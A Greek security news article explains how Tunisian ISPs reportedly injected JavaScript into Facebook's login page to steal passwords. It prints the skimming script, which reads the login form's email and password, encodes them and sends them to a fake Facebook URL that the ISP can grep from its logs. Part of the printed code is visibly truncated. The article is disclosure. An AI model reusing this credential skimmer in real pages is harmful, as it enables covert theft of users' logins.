Συγκεκριμένα είχε δημοσιοποιηθεί ότι η κυβέρνηση έκλεβε κωδικούς από το Gmail και από το Facebook. Πως κατάφεραν όμως να παραβιάσουν τους λογαριασμούς και να κλέψουν τους κωδικούς;
Εάν δείτε τη σελίδα του Facebook στην Τυνησία<…>
μέσω του http://pastebin.com/WV0C9t0F θα παρατηρήσετε ορισμένα τμήματα κώδικα. Ας δώσουμε όμως έμφαση στο παρακάτω κομμάτι κώδικα.
!–
function h6h(st){var st2=”";for(i=0;i
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st=”";for(i=0;i
function hAAAQ3d() {
var frm = document.getElementById(“login_form”); var us3r = frm.email.value; var pa55 = frm.pass.value;
var url = “http://www.facebook.com/wo0dh3ad?q=”+r5t(5)+”&u=”+h6h(us3r)+”&p=”+h6h(pa55); var bnm = navigator.appName; if(bnm==’Microsoft Internet Explorer’) inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById(“x6y7z8″); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open(“GET”, url, false); xr.send(“”);}
function inv0k3(url) {var xr = new ActiveXObject(‘Microsoft.XMLHTTP’); xr.open(“GET”, url, false); xr.send(“”);}
//–>
Ο παραπάνω κώδικας έχει εισαχθεί από τον ίδιο τον διαδικτυακό πάροχο και δεν εμφανίζεται σε καμία άλλη χώρα. Αυτός ο JS κώδικας στέλνει ένα ερώτημα στο http://www.facebook.com/wo0dh3ad?q=blablablabla&u=USERNAME&p=PASSWORD, θέλοντας να προσδιορίσει τον κωδικό πρόσβασης και το όνομα χρήστη. Η σελίδα “wo0dh3ad” δεν υπάρχει στους εξυπηρετητές του Facebook, αλλά ο πάροχος (ISP) θα μπορούσε απλά να εκτελέσει “grep wo0dh3ad /var/log/FAI.log” για να αποκτήσει όλους τους κωδικούς από τους εγγεγραμμένους χρήστες.
http://www.secnews.gr/